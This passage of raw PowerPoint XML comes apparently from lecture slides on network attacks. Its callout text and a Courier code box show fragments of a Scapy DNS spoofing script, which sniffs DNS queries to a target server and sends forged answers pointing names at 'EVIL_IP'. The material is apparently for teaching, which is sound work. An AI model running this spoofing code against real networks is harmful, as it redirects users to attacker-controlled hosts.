                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE89385-D1CA-FE20-D16B-CD9B7228CB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="3893870"/>
            <a:ext cx="3271550" cy="1329535"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43074"/>
              <a:gd name="adj2" fmla="val -90378"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Creates the Response Record. Associates the searched name with the malicious IP address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37794941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E9EB87-018F-9B0E-5745-968AF1410FA7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3509A367-3ABA-0767-15FD-9397F1D49377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418A17A1-27F3-AB7F-E758-89C55DD2A7BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>spoofed_pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}", </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>prn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>KeyboardInterrupt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
